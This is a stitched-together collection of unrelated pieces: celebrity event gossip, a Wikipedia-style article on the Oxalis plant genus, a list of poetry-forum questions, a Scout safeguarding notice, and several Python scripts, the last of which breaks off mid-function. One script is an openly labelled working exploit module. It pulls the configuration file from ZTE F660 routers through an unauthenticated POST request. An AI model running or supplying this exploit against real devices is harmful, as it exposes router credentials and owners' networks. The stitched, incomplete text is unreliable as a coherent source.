DuJour Media, Gilt & JetSmarter hosted a party to kick off Art Basel week on Nov. 30 with friends Larsa Pippen, Jonathan Cheban, Audrina Patridge and Karolina Kurková at The Confidante in Miami.
On Nov. 17, Dancing With the Stars alum and NFL MVP Von Miller hosted a workout event with Chef's Cut Real Jerky in New York City.
Brooklyn-based contemporary artist Mark Anthony Green partnered with ultra-premium tequila brand, Tequila Avión, for his What Comes After J? exhibit at W South Beach, where he hosted a private 50-person dinner for guests, including Tyson Beckford and Karrueche Tran at Art Basel in Miami.
Gossip Girl alum Penn Badgley made his Miami Art Basel debut with his band MOTHXR at the Life of the Party event held at the Brickell City Centre on Nov. 28. He and the band had throngs of ladies and fans hanging on every lyric as they played songs from their new album, including "Victim, She Can't Tell" and "Touch." The band later dined at hotspot Quinto La Huella at EAST, where Badgley, now rocking blond locks, was overheard telling a fan it was their first time playing in Miami and they couldn't wait to come back.
STK Midtown New York City was lively on Saturday night as the cast of Saturday Night Live and host Emma Stone descended upon the restaurant for an after-party that went well into the early morning. Cast members, including Kate McKinnon, Aidy Bryant, and Leslie Jones, began filing in around 1:30 a.m. and were joined shortly after by Questlove as well as Stone. Colin Jost, Kyle Mooney and Lorne Michaels were also in attendance.
Stone, who looked elegant in a navy blue suede pea coat and stilettos, was spotted enjoying oysters and sipping on margaritas throughout the evening. She and a group of more than 10 friends closed out the night, leaving around 5 a.m.
Beverley Mitchell brought husband Michael Cameron and their children, Kenzie, 3, and Hutton, 1, to the 6th Annual Santa's Secret Workshop, benefiting L.A. Family Housing at Andaz in West Hollywood, California, on Dec. 3.
Meanwhile, This Is Us star Chrissy Metz left a very generous tip and said goodbye to the staff after getting a manicure at Nail Garden in Burbank, California, on Dec. 4.
On Dec. 5, Bachelor and Bachelorette alums Luke Pell, Jordan Rodgers, JoJo Fletcher, Becca Tilley, Robert Graham and Chris Soules attended Becca Tilley's Blog and YouTube launch party at The Bachelor Mansion in Los Angeles, while Victoria's Secret Angel Taylor Hill sat down with Dimpy Sethi of Amazon's live-stream fashion and beauty show Style Code Live to spill on her beauty hacks, affordable hair favorites and life as an Angel.
Hallmark Channel held a screening for the upcoming A Nutcracker Christmas on Dec. 6 at The Grove in Los Angeles. In attendance were the stars of the movie, Amy Acker, Sascha Radetsky and Sophia Lucia along with Jojo Siwa, Trevor Donovan, ET's Cameron Mathison, Chelsea Kane and many more. The guests were delighted to be joined by dancers from the Moorpark Civic Ballet and Dance Theatre.
The new movie is part of Hallmark Channel's Countdown to Christmas and premieres Saturday at 8 p.m. ET/PT on Hallmark Channel. |
"""Add the high level classes (person/organization/etc.) to a label file."""
import argparse
import pickle
from tqdm import tqdm
def read_arguments():
parser = argparse.ArgumentParser()
parser.add_argument('--labels_file',
type=unicode,
help='Pickled file with a list of labels')
parser.add_argument('--mapping_file',
type=unicode,
help='Pickled file with the mapping from yago labels'
'to high level labels')
return parser.parse_args()
def pickle_from_file(filename):
    with open(filename, 'rb') as input_file:  # binary mode for pickle
        result = pickle.load(input_file)
    return result
def main():
args = read_arguments()
print 'Reading arguments'
labels = pickle_from_file(args.labels_file)
mapping = pickle_from_file(args.mapping_file)
print 'Processing labels'
for index, label in tqdm(enumerate(labels)):
if len(label) != 5:
print 'Malformed label at index {}'.format(index)
continue
if label[0].startswith('O'):
continue
yago_category = label[1].replace('I-', '').replace('B-', '')
        if yago_category not in mapping:
print 'Error, unknown yago category {}'.format(yago_category)
continue
high_level_category = label[1][0] + '-' + mapping[yago_category]
labels[index] = label[:3] + (high_level_category, ) + label[4:]
print 'Saving results'
    with open(args.labels_file, 'wb') as output_file:  # binary mode for pickle
        pickle.dump(labels, output_file)
if __name__ == '__main__':
main()
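# Example invocation (script and file names are illustrative):
#   python add_high_level_labels.py --labels_file labels.pickle \
#       --mapping_file yago_mapping.pickle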
|
All Leaders and Adults at 8th Ashford, including parent helpers within any Section, who help with any activity involving the care and welfare of your child, do so under the guidance and support of the Scout Association's Child Protection Policy.
If you choose to send your son or daughter to 8th Ashford, on the first evening they attend you will be asked to stay for an induction meeting. During this meeting each adult will be issued with the above mentioned yellow card for their own information and safeguard. Also discussed and handed out will be the Criminal Records Bureau Clearance Application Form.
Many adults, through their own careers or pastimes, may have already completed a 'DBS' form at some time. You will be asked to submit another on behalf of Gilwell, the Scout Association Headquarters, if you wish to contribute your help for trips and activities. One clearance certificate does not globally cover you for any association. Again, these forms and any matters arising will be covered in your first induction meeting.
Please read the latest information from The Scout Association regarding DBS Clearance. |
import logging
import json
import sys
import tempfile
from mimetypes import guess_type
from django.http import HttpResponse
from django.conf import settings
from cam.models import WebCam, is_file_image
logger = logging.getLogger(__name__)
def get_snapshot(request):
"Take a webcam snapshot and return it as HTTP response"
content_type = 'application/json'
body = json.dumps('Failed snapshot')
# Try every available WebCam object to take the snapshot,
# until the first one that succeeds
for cam in WebCam.objects.all().order_by('priority'):
logger.debug('Attempting saveSnapshot with %s' % (cam))
snapshot_file = cam.saveSnapshot()
if snapshot_file and is_file_image(snapshot_file):
content_type, _ = guess_type(snapshot_file)
if content_type:
                with open(snapshot_file, 'rb') as snapshot:
                    body = snapshot.read()
                break
else:
content_type = 'application/json'
return HttpResponse(body, content_type=content_type)
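# Hypothetical URLconf wiring for the view above (illustrative pattern and
# name; the project's actual urls.py is not part of this excerpt):
from django.conf.urls import url

urlpatterns = [
    url(r'^cam/snapshot/$', get_snapshot, name='cam-snapshot'),
]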
|
Learn about Watch Technologies' sluice gates, gate actuators, and water management control systems, and recent projects in the Watch Technologies blog.
Monitoring multiple pipeline data collection stations. Master Station and four remotes, one with weather station. Master station PC HMI is a web server. Cell-modem telemetry enabled, Internet display and database access via client’s web site. |
import random
class _AI:
def get_command_letter(self, command):
if command == 0:
return "w"
elif command == 1:
return "a"
elif command == 2:
return "s"
else:
return "d"
class RandomAI(_AI):
def __init__(self):
self.name = "random_ai"
def get_next_command(self, available_commands):
self.current_command = random.randint(0, 3)
return self.get_command_letter(self.current_command)
class DirectionAI(_AI):
def __init__(self):
self.name = "direction_ai"
def get_next_command(self, available_commands):
if available_commands["s"]: # Prefer "down" movements
return "s"
elif available_commands["a"]: # Then "left"
return "a"
elif available_commands["d"]: # Then "right"
return "d"
else: # Only move "up" if no others are available
return "w"
class PairCheckAI(_AI):
def __init__(self):
self.name = "pair_check_ai"
self.direction_points = {"w": 0, "a": 0, "s": 0, "d": 0}
def get_next_command(self, available_commands):
# Check which direction to move
# print("calculating points for board:")
h_points = self.calc_points(self.board)
rotated_board = self.rotate_board(self.board)
v_points = self.calc_points(rotated_board)
# No points, return a random direction
if h_points == 0 and v_points == 0:
# print("nothing, random movement")
return self.get_command_letter(random.randint(0, 3))
# print("h: " + str(h_points))
# print("v: " + str(v_points))
# Up/down and left/right scores are the same
self.direction_points["w"] = v_points
self.direction_points["a"] = h_points
self.direction_points["s"] = v_points
self.direction_points["d"] = h_points
dir_letter = max(self.direction_points, key=self.direction_points.get)
# print("moving: " + dir_letter)
return dir_letter
def update_board(self, board):
self.board = board
# Calculates the number of points in each row
def calc_points(self, board):
# self.print_board(board)
total_score = 0
for row in board:
score = 0
for n in row:
if n == 0:
pass
elif score == 0:
score = n
elif score != n:
score = n
elif score == n:
# will_score = True
score *= 2
total_score += score
score = 0
return total_score
    # Rotates (transposes) the board so columns can be scored as rows
def rotate_board(self, board):
row_size = len(board)
board_size = row_size ** 2
rotated = []
for i in range(0, row_size):
rotated.append([])
for i in range(0, board_size):
            rotated[i // row_size].append(board[i % row_size][i // row_size])
return rotated
def print_board(self, board):
for i in board:
print(i)
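# Quick illustration with a hypothetical 4x4 board (0 denotes an empty cell):
if __name__ == '__main__':
    ai = PairCheckAI()
    ai.update_board([[2, 2, 0, 0],
                     [4, 0, 4, 0],
                     [0, 0, 0, 0],
                     [0, 0, 0, 2]])
    print(ai.get_next_command({"w": True, "a": True, "s": True, "d": True}))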
|
Oxalis /ˈɒksəlɪs/ is a large genus of flowering plants in the wood-sorrel family Oxalidaceae comprising about 570 species. The genus occurs throughout most of the world, except for the polar areas; species diversity is particularly rich in tropical Brazil, Mexico and South Africa.
Many of the species are known as wood sorrels (sometimes written "woodsorrels" or "wood-sorrels") as they have an acidic taste reminiscent of the sorrel proper (Rumex acetosa), which is only distantly related. Some species are called yellow sorrels or pink sorrels after the color of their flowers instead. Other species are colloquially known as false shamrocks, and some called sourgrasses. For the genus as a whole, the term oxalises is also used.
These plants are annual or perennial. The leaves are divided into three to ten or more obovate and top notched leaflets, arranged palmately with all the leaflets of roughly equal size. The majority of species have three leaflets; in these species, the leaves are superficially similar to those of some clovers. Some species exhibit rapid changes in leaf angle in response to temporarily high light intensity to decrease photoinhibition.
Several Oxalis species dominate the plant life in local woodland ecosystems, be it Coast Range ecoregion of the North American Pacific Northwest, or the Sydney Turpentine-Ironbark Forest in southeastern Australia where least yellow sorrel (O. exilis) is common. In the United Kingdom and neighboring Europe, common wood sorrel (O. acetosella) is the typical woodland member of this genus, forming large swaths in the typical mixed deciduous forests dominated by downy birch (Betula pubescens) and sessile oak (Quercus petraea), by sycamore maple (Acer pseudoplatanus), common bracken (Pteridium aquilinum), pedunculate oak (Q. robur) and blackberries (Rubus fruticosus agg.), or by common ash (Fraxinus excelsior), dog's mercury (Mercurialis perennis) and European rowan (Sorbus aucuparia); it is also common in woods of common juniper (Juniperus communis ssp. communis). Some species – notably Bermuda-buttercup (O. pes-caprae) and creeping woodsorrel (O. corniculata) – are pernicious, invasive weeds when escaping from cultivation outside their native ranges; the ability of most wood-sorrels to store reserve energy in their tubers makes them quite resistant to most weed control techniques.
Tuberous woodsorrels provide food for certain small herbivores – such as the Montezuma quail (Cyrtonyx montezumae). The foliage is eaten by some Lepidoptera, such as the Polyommatini pale grass blue (Pseudozizeeria maha) – which feeds on creeping wood sorrel and others – and dark grass blue (Zizeeria lysimon).
Oxalis species are susceptible to rust (Puccinia oxalidis).
Wood sorrel (a type of oxalis) is an edible wild plant that has been consumed by humans around the world for millennia. In Dr. James Duke's Handbook of Edible Weeds, he notes that the native American Kiowa people chewed wood sorrel to alleviate thirst on long trips, the Potawatomi cooked it with sugar to make a dessert, the Algonquin considered it an aphrodisiac, the Cherokee ate wood sorrel to alleviate mouth sores and a sore throat, and the Iroquois ate wood sorrel to help with cramps, fever and nausea.
The fleshy, juicy edible tubers of the oca (O. tuberosa) have long been cultivated for food in Colombia and elsewhere in the northern Andes mountains of South America. It is grown and sold in New Zealand as "New Zealand yam" (although not a true yam), and varieties are now available in yellow, orange, apricot, and pink, as well as the traditional red-orange.
The leaves of scurvy-grass sorrel (O. enneaphylla) were eaten by sailors travelling around Patagonia as a source of vitamin C to avoid scurvy.
In India, creeping wood sorrel (O. corniculata) is eaten only seasonally, starting in December–January. The Bodos of north east India sometimes prepare a sour fish curry with its leaves. The leaves of common wood sorrel (O. acetosella) may be used to make a lemony-tasting tea when dried.
A characteristic of members of this genus is that they contain oxalic acid (whose name references the genus), giving the leaves and flowers a sour taste which can make them refreshing to chew. In very large amounts, oxalic acid may be considered slightly toxic, interfering with proper digestion and kidney function. However, oxalic acid is also present in more commonly consumed foods such as spinach, broccoli, brussels sprouts, grapefruit, chives, and rhubarb, among many others. General scientific consensus seems to be that the risk of sheer toxicity, actual poisoning from oxalic acid in persons with normal kidney function is "wildly unlikely".
While any oxalic acid-containing plant, such as Oxalis, is toxic to humans in some dosage, the U.S. National Institutes of Health note that oxalic acid is present in many foodstuffs found in the supermarket and its toxicity is generally of little or no consequence for people who eat a variety of foods.
In the past, it was a practice to extract crystals of calcium oxalate for use in treating diseases and as a salt called sal acetosella or "sorrel salt" (also known as "salt of lemon"). Growing oca tuber root caps are covered in a fluorescent slush rich in harmaline and harmine which apparently suppresses pests. Creeping wood sorrel and perhaps other species are apparently hyperaccumulators of copper. The Ming Dynasty text Precious Secrets of the Realm of the King of Xin from 1421 describes how O. corniculata can be used to locate copper deposits as well as for geobotanical prospecting. It thus ought to have some potential for phytoremediation of contaminated soils.
Several species are grown as pot plants or as ornamental plants in gardens, for example, O. versicolor.
Oxalis flowers range in colour from whites to yellows, peaches, pinks, or multi-coloured flowers.
Some varieties have double flowers, for example the double form of O. compressus. Some varieties are grown for their foliage, such as the dark purple-leaved O. triangularis.
Species with four regular leaflets – in particular O. tetraphylla (four-leaved pink-sorrel) – are sometimes misleadingly sold as "four-leaf clover", taking advantage of the mystical status of four-leaf clover.
Oxalis stricta – common yellow woodsorrel, common yellow oxalis, upright yellow-sorrel, lemon clover, "pickle plant", "sourgrass", "yellow woodsorrel"
^ "Oxalis". NC State University.
^ S. L. Nielsen, A. M. Simonsen (September 2011). "Photosynthesis and photoinhibition in two differently coloured varieties of Oxalis triangularis — the effect of anthocyanin content". Photosynthetica. 49 (3): 346–352. doi:10.1007/s11099-011-0042-y.
^ Mahr, Susan (March 2009). "Shamrocks, Oxalis spp". Master Gardener Program University of Wisconsin-Extension.
^ "Archived copy". Archived from the original on 2005-10-24. Retrieved 2005-10-18. CS1 maint: Archived copy as title (link) "Oxalic Acid Content of Selected Vegetables"
^ http://oxalicacidinfo.com/ "Sheer toxicity – actual poisoning – from ingested oxalic acid is wildly unlikely. The only foodstuff that contains oxalic acid at concentrations high enough to be an actual toxicity risk is the leaves – not the stalks, which is what one normally eats – of the rhubarb plant. (And you'd need to eat an estimated 11 pounds (5kg) of rhubarb leaves at one sitting for a lethal dose, though you'd be pretty sick with rather less.)"
^ http://dietary-supplements.info.nih.gov/factsheets/calcium.asp "Other components in food: phytic acid and oxalic acid, found naturally in some plants, bind to calcium and can inhibit its absorption. Foods with high levels of oxalic acid include spinach, collard greens, sweet potatoes, rhubarb, and beans. Among the foods high in phytic acid are fiber-containing whole-grain products and wheat bran, beans, seeds, nuts, and soy isolates. The extent to which these compounds affect calcium absorption varies. Research shows, for example, that eating spinach and milk at the same time reduces absorption of the calcium in milk. In contrast, wheat products (with the exception of wheat bran) do not appear to have a negative impact on calcium absorption. For people who eat a variety of foods, these interactions probably have little or no nutritional consequence and, furthermore, are accounted for in the overall calcium DRIs, which take absorption into account."
Wikimedia Commons has media related to Oxalis.
This page was last edited on 29 January 2019, at 13:51 (UTC). |
# Name:ZTE F660 remote config download
# File:f660_config_download.py
# Author:Ján Trenčanský
# License: GNU GPL v3
# Created: 25.12.2015
# Last modified: 25.12.2015
# Shodan Dork:
# Description: ZTE F660 firmware Version: 2.22.21P1T8S does not check Cookies And Credentials on POST
# Based on: https://www.exploit-db.com/exploits/36978/
import core.Exploit
import core.io
import requests
from interface.messages import print_error, print_success, print_warning, print_info
class Exploit(core.Exploit.RextExploit):
"""
Name:ZTE F660 remote config download
File:f660_config_download.py
Author:Ján Trenčanský
License: GNU GPL v3
Created: 25.12.2015
Description: ZTE F660 firmware Version: 2.22.21P1T8S does not check Cookies And Credentials on POST
Based on: https://www.exploit-db.com/exploits/36978/
Options:
Name Description
host Target host address
port Target port
"""
def __init__(self):
core.Exploit.RextExploit.__init__(self)
def do_run(self, e):
url = "http://%s:%s/getpage.gch?pid=101&nextpage=manager_dev_config_t.gch" % (self.host, self.port)
try:
print_warning("Sending exploit")
# It took me longer than necessary to find out how to use Content-Disposition properly
# Always set stream=True otherwise you may not get the whole file
response = requests.post(url, files={'config': ''}, timeout=60, stream=True)
if response.status_code == 200:
if response.headers.get('Content-Disposition'):
print_success("got file in response")
print_info("Writing file to config.bin")
core.io.writefile(response.content, "config.bin")
print_success("you can now use decryptors/zte/config_zlib_decompress to extract XML")
except requests.ConnectionError as e:
print_error("connection error %s" % e)
except requests.Timeout:
print_error("timeout")
Exploit()
|
Ever met a Bat named Luc?
What the heck is a Scifaiku?
What will you think if the moon melted?
Ever feel hopeless? Not good enough?
The Most Evil Animal to have Graced the Land.?
A Pome - a fun thing. Do you share my secret vice?
How would you try to describe "cowboy poetry" ?
Is my poetry good or is it bad??
New Poem Please raead and tell me what u think please:?
I wrote this poem and I was wondering what people think?
My poem 'Reset' what do you think? ?
If a leaf falls in the water, does anyone listen?
How do a write a good poem?
Poems: edited haiku, do you like?
Have you ever been smitten by the beauty of a person?
Metaphorically speaking. Metaphorically Speaking? ?
Can u rate my poem piiiiiiiiz?
How would one describe brown eyes?
Critque My Poem: Whirl Wind of Love?
Rhyming Help, Whoever can rhyme plz help me out ???
What would the best poetic response be in this situation?
Do some of these things bother you too?
Have you ever heard a silent scream?
Who else loves this Poem?
Can this be taken as a poem?
I know I've asked this already, but I'm just looking for more opinions.
Anybody willing to lend an opinion? =)?
Hopelessness... Give Me A Poem...?
A Septolet, your comments and critique please?
My attempt at a Septolet, your comments please?
Your opinion on this poem i wrote ?
What say you to 'One Sad *ss Morning Pome?"?
What say about 'Another Space/Time Triviality'?
What do you think of my Con-verb about time and space?
Wat rhymes wth billion that isnt a #word or stupid?
Who can answer my Question about Space and Time?
There is a poem: The moons my constant mistress and the lovely owl my marrow?
Help find poems on parent-child relationships?
Poem - A Pensive Saturday - What Do You Think?
Should i hand this in to my teacher or not? thanks!?
New poem check it out rate it bash it do what ya want ?
Do I have talent is it any good.?
Poem that needs criticizing ?
In the real world could you compose 2 lines of meaningful Poetry?
Can you give me your comments and point of view on this poem?
Anyone who has any skill with poetry help I need it?
Family Relationship Poems-- WILL AWARD BEST ANSWER!!?
What are some good poems in trochaic meter?
Poems: Are these good haiku`s or not?
What do you think in this poem?
Thoughts on my poem, please?
A poem I wrote, feedback welcome :)?
NEW POEM! Please read and tell me what you think! Won't you?
Who ever feels like this rhyme?
Are there any Poetry Contests going on right now?
What do you have to say about this poem? ?
All opinions would be greatly appreciated?
Another Poem By Carl Walker Tell Me What You Think?
Can this really be true of the poet?
I wrote this poem...is it any good?
What Do You Think Of These Poems?? Be Honest Please?
Please help me finish up my poem?
What happens when something's missing?
Starfish can turn inside out, critique?
Is it true, you are what you Yeats?
What do you think about this song/poem?
Have you seen "The One I Love"? ?
Critique My Poem: I like You To Be Mine.?
What are some good poems about being depressed about love?
POEM:Can you guess what this haiku is about?
Another poem of thought provoking material?
A short poem of ponder evoking quality?
Do you like my poem? ?
What do you think about my poem? Honest but not to harsh please!?
How bad is this poem?
Would you please tell me how strange this actually is?
I revised my poem, please critique.?
I'm wrote a poem, will you critique?
POEM: How is this summer limerick?
Where can I send my poems and plays off so they can be critiqued?
Who is your favorite living American poet?
Do you sometimes take a break just to write a poem?
When you come across a great feast-meal, do you feel obligated to share?
Is my poetry good :X please read them?
A Con-Vert: How can there be a second final of anything?
I tried a Partenza Represa. Does it follow the rules?
I NEED A GOOD IM SORRY POEM!!!!!?
Have you ever walked this walk?
How is this Partenza Represa ?
How is this Partenza Represa? Did I do it right?
How often do you do heavy housecleaning?
Poem to a loved one on the other side of the world...does this sound ok?
Do you like breezy, lazy days and is this a Partenza Represa?
Have you woken up and seen things differently?
I made a new poem check it out ?
Poem I just wrote, what do you think? Criticism welcome. It's a bit long.?
Why do people usually write poetry when they feel unhappy?
Could you leave some feedback on this poem I've written.?
Is this a nautical theme? or a dream...?
Will the madness ever stop? I hope not...?
How can i find some beautiful urdu poetry on time !?
Help need to find poetry and quotes.?
What do you think about this funny poem?
Should i send this poem to my friend?
Check out my writing tell me what you think?
Would anyone care to critique or comment on this poem?
Poem I just wrote. What do you think? Criticism welcome.?
Any feedback on my poem? One of my longer ones.?
Can anyone find me the poem litany by john ashbury?
Grannyjill's Trigee - Do you like it?
Do you enjoy my poem? Could you tell me why or why not?
Any ideas for a "wisdom" poem?
DO U LIKE MY POEM???
Have you been there, have you?
Should i submit this to a poetry contest?
Are you free to misremember? Misquote? I'm on a roll now.?
How do you find this poem? Thoughts and feelings?
Do I have to ask? Thoughts and feelings?
Critique my poem: The Path of the Wayfarer...?
Isnt this a cute poem?
Is it alright if I try a Pertenza Ripresa?
Please make a SHORT POEM?
Another peom ,i want honest answers plz,,what doyou think?
Do you LIke This Pome Tell Me Why?
A Poem - Home Ownership - A pleasure or not?
What do you think of this poems?
A Bob M. Georgia limerick?
Are you feeling creative? Finish this poem....?
Hows this for a poem?!!?
Can you kindly think of a few nice phrases?
Please comment/interpret my poem 'Ogre'. It would mean alot. Thanks.?
Whats this kind of poem called?
Dr. Seuss-ish b-day poem needed?
Why are most of Burn's poem difficult to read...?
I need a good fifteen sentence portrait (type of poem)?
Poem....my best friends kemo...critique please!?
Sharing one of mine with you. What are your thoughts on my poem?
'the waste land' by t.s. eliot?
Would you please turn the light on?
TD or not TD. What is your question?
Is my mush mushier than your mush?
Who has come forth bearing no honor?
And what is compulsive about your behavior?
The devils been in your parlour ?
What do you think of my poems/short stories??
How's this for a love poem?
Have you ever been truly "Alone"? (Prose or Poetry?)?
Thunderstorms are...(fill in the blank)?
The limerick and Trigee have mated: care to see the baby?
How about Limerick number two?
Is this a Martian Limerick?
I just wrote this awhile ago i really like this one ?
What would you do if you were left at the dock? (Hydropro limerick)?
Is this a sea worthy Limerick?
Can you love too deeply?
How do you like this whatever you want to call it?
Is this an original form and how can I improve it?
Do you like this new Trigee?
What do think of this Trigee?
Which is sharper, the knife or the heart?
Do you keep careful records?
What sort of poem is this?
I have a poem, comments please.?
Can anyone tolerate a Semper Trigee?
Who has visited the "Old Folks Home" this week?
"Keepsake Vows" A poem for comment, who, what,why,when?
And what type of medication would you advise?
Another poem about my friend who passed away? (tell me what you think)?
Have you suffered from morning confusion?
Would you like read my poem? and comment?
Write one line for this poem ? ? ? ? ? ? ?
My Poem: Writers Block. Please review it.?
Do you remember your first prom date?
How do you like my Poem? ?
Do you like this silly pome for people who love spelling?
I wrote this poem.Do ya like it?
Have you ever seen a strange sky, and how do like your illumination?
What do you think or have to say about my poem?
What should be the title of this poem?
What do you think about my poem?
import ReactionMaker.inversion as inversion
import ReactionMaker.duplicate as duplicate
import ReactionMaker.increment as increment
import ReactionMaker.decrement as decrement
import ReactionMaker.multiply as multiply
import ReactionMaker.logarithm as logarithm
import ReactionMaker.power as power
import Simulator.XMLParser as XMLParser
def getHistoryFileName(xmlFileName):
    # 'adder.xml' -> 'history_adder.txt': drop the 'xml' extension (the dot stays) and append 'txt'
    base = xmlFileName[:-3]
    return 'history_' + base + 'txt'
def printWelcomeMessage():
print "Welcome to the Chemical Computer world!!"
def executeInversion():
var = raw_input("Enter the value you want to invert: ")
return inversion.execute(var)
def executeDuplicate():
var = raw_input("Enter the value you want to duplicate: ")
return duplicate.execute(var)
def executeDecrement():
var = raw_input("Enter the value you want to decrement: ")
return decrement.execute(var)
def executeIncrement():
var = raw_input("Enter the value you want to increment: ")
return increment.execute(var)
def executeMultiply():
input1 = raw_input("Enter the value of input 1: ")
input2 = raw_input("Enter the value of input 2: ")
return multiply.execute(input1,input2)
def executeLogarithm():
var = raw_input("Enter the value you want to take logarithm of: ")
return logarithm.execute(var)
def executePower():
input1 = raw_input("Enter the value of base: ")
input2 = raw_input("Enter the value of exponent: ")
return power.execute(input1,input2)
def showMainMenu():
print "Enter your choice here: "
print "1: Basic Functions"
print "2: Advanced Functions"
print "3: Exit"
def showBasicFunctionsMenu():
print "Select any one of the below basic function"
print "1: Inversion"
print "2: Duplication/Copy"
print "3: Decrementation"
print "4: Incrementation"
def showAdvancedFunctionsMenu():
print "Select any one of the below advanced function"
print "1: Multiplication"
print "2: Logarithm"
print "3: Power"
def showInvalidMessageAndQuit():
print "Please select only one of the given choice"
print "Quitting the Chemical World ..."
quit()
def plotResults(xmlFile,chemicalList,timeOfSimulation):
historyFile = getHistoryFileName(xmlFile)
sim = XMLParser.getSimulator(xmlFile)
sim.simulate(timeOfSimulation,historyFile)
sim.plot(chemicalList)
def executeBasicFunction(userChoice):
outputFileName = ''
chemicalList = []
if userChoice == 1:
outputFileName,chemicalList = executeInversion()
elif userChoice == 2:
outputFileName,chemicalList = executeDuplicate()
elif userChoice == 3:
outputFileName,chemicalList = executeDecrement()
elif userChoice == 4:
outputFileName,chemicalList = executeIncrement()
else:
showInvalidMessageAndQuit()
print 'Result File ' + outputFileName + ' Created'
timeOfSimulation = int(raw_input('Enter Time Of Simulation: '))
plotResults(outputFileName,chemicalList,timeOfSimulation)
def executeAdvancedFunction(userChoice):
outputFileName = ''
chemicalList = []
if userChoice == 1:
outputFileName,chemicalList = executeMultiply()
elif userChoice == 2:
outputFileName,chemicalList = executeLogarithm()
elif userChoice == 3:
outputFileName,chemicalList = executePower()
else:
showInvalidMessageAndQuit()
print 'Result File ' + outputFileName + ' Created'
timeOfSimulation = int(raw_input('Enter Time Of Simulation: '))
plotResults(outputFileName,chemicalList,timeOfSimulation)
def executeUserChoice(userChoice):
if userChoice == 1:
showBasicFunctionsMenu()
        userChoice = int(raw_input())  # raw_input: plain input() would eval() the typed text in Python 2
executeBasicFunction(userChoice)
elif userChoice == 2:
showAdvancedFunctionsMenu()
        userChoice = int(raw_input())
executeAdvancedFunction(userChoice)
elif userChoice == 3:
print "Quitting the Chemical World ..."
quit()
else:
showInvalidMessageAndQuit()
def main():
    printWelcomeMessage()
    while True:
        print ""
        showMainMenu()
        userChoice = int(raw_input())
        executeUserChoice(userChoice)

if __name__ == '__main__':
    main()
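The ReactionMaker modules themselves are not part of this file. As a rough sketch of the contract the menu driver assumes (inferred from the calls above, not confirmed by the source), each module exposes an execute() that builds a reaction-network XML file and reports which chemical species to plot:

# Hypothetical stand-in for a ReactionMaker module (e.g. inversion), useful for
# exercising the menu driver without the real reaction generator.
def execute(value):
    # The real module is assumed to write the reaction network XML here.
    outputFileName = 'inversion_' + str(value) + '.xml'
    chemicalList = ['X', 'Y']  # species the driver later passes to sim.plot()
    return outputFileName, chemicalList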
Chocolate Cherry Frosting is a free HD wallpaper. It was uploaded on April 21, 2019 by admin. You can download it to your computer by clicking a resolution under "Download by size:". Don't forget to rate and comment if you are interested in this wallpaper.
# -*- coding: utf-8 -*-
import os, sys
import time
import traceback
from dCore import *
class DamnLog:
def __init__(self, logpath=None, stderr=True, flush=False, handleerrors=True, overrides={}):
DamnLog.instance = self
self.time = 0
self.streams = []
self.autoflush = flush
        self.overrides = dict(overrides)  # copy the argument; assigning {} here discarded it, and a copy avoids sharing the mutable default
if logpath is not None:
try:
if not os.path.exists(os.path.dirname(logpath)):
os.makedirs(os.path.dirname(logpath))
f = DamnOpenFile(logpath, 'wb')
self.streams.append(f)
f.write((self.getPrefix() + u'Log opened.').encode('utf8'))
except:
try:
print 'Warning: Couldn\'t open log file!'
traceback.print_exc()
except:
pass
if stderr:
            self.streams.append(sys.stderr)  # stderr, as the flag says; close() deliberately spares this stream
if handleerrors:
try:
sys.excepthook = self.logException
except:
self.log('!! Cannot override excepthook. This looks bad.')
def getPrefix(self):
t = int(time.time())
if self.time != t:
self.time = t
return u'[' + DamnUnicode(time.strftime('%H:%M:%S')) + u'] '
return u''
def write(self, message):
message = u'\r\n' + (self.getPrefix() + DamnUnicode(message.strip())).strip()
for s in self.streams:
try:
print >> s, message.encode('utf8'),
except:
try:
print 'Could not print to stream', s,'message:', message.strip()
except:
pass
if self.autoflush:
self.flush()
def log(self, *args):
import dCore
s = []
for i in args:
i = dCore.DamnUnicode(i)
for k in self.overrides.iterkeys():
i = i.replace(k, self.overrides[k])
s.append(i)
return self.write(u' '.join(s))
def logException(self, typ, value, tb):
import traceback
import dCore
import dLog
try:
info = traceback.format_exception(typ, value, tb)
e = []
for i in info:
e.append(dCore.DamnUnicode(i).strip())
self.log('!!',u'\n'.join(e))
except:
try:
self.log('!! Error while logging exception. Something is very wrong.')
except:
pass # Something is very, very wrong.
def flush(self):
for s in self.streams:
try:
s.flush()
except:
pass
try:
os.fsync(s)
except:
pass
def close(self):
self.log('Closing log.')
for s in self.streams:
if s != sys.stderr:
try:
s.close()
except:
pass
    def addOverride(self, target, replacement=u''):
        self.overrides[DamnUnicode(target)] = DamnUnicode(replacement)
def Damnlog(*args):
if DamnLog.__dict__.has_key('instance'):
return DamnLog.instance.log(*args)
return None
def DamnlogException(*args):
if DamnLog.__dict__.has_key('instance'):
return DamnLog.instance.logException(*args)
return None
def DamnlogOverride(target, replacement=u''):
DamnLog.instance.addOverride(target, replacement)
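A minimal usage sketch (the log path and messages are invented for illustration; everything else uses only the API defined above):

if __name__ == '__main__':
    log = DamnLog(logpath='logs/session.log', flush=True)  # hypothetical path
    log.addOverride(u'hunter2', u'********')  # scrub a secret from every line
    Damnlog('Starting up; argv =', sys.argv)  # module-level convenience helper
    try:
        1 / 0
    except:
        DamnlogException(*sys.exc_info())
    log.close()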
|
The kinds of things you run across at 3:17 in the morning on the Internet.
Re: Funniest print on Thingiverse?
There are way too many bad jokes to build around that.
The funny part is there are 2608 downloads of that thing.
Must print (the first one!) ROFL! |
#!/usr/bin/env python
import os
import sys
import os.path as op
import mtpy.core.edi as MTedi
def main():
fn = sys.argv[1]
if not op.isfile(fn):
print('\n\tFile does not exist: {0}\n'.format(fn))
sys.exit()
saveplot = False
if len(sys.argv) > 2:
arg2 = sys.argv[2]
if 's' in arg2.lower():
saveplot = True
fn = plotedi(fn, saveplot)
def plotedi(fn, saveplot=False, component=None):
edi = MTedi.Edi()
try:
edi.readfile(fn)
except:
print('\n\tERROR - not a valid EDI file: {0}\n'.format(fn))
sys.exit()
# if saveplot is True:
# import matplotlib
# matplotlib.use('Agg')
import pylab
lo_comps = []
    if component is not None:
        # collect the requested components ('n' and/or 'e'); default to both below
        try:
            if 'n' in component.lower():
                lo_comps.append('n')
            if 'e' in component.lower():
                lo_comps.append('e')
        except AttributeError:
            pass
if len(lo_comps) == 0:
lo_comps = ['n', 'e']
res_te = []
res_tm = []
phi_te = []
phi_tm = []
reserr_te = []
reserr_tm = []
phierr_te = []
phierr_tm = []
for r in edi.Z.resistivity:
res_te.append(r[0, 1])
res_tm.append(r[1, 0])
for p in edi.Z.phase:
phi_te.append(p[0, 1] % 90)
phi_tm.append(p[1, 0] % 90)
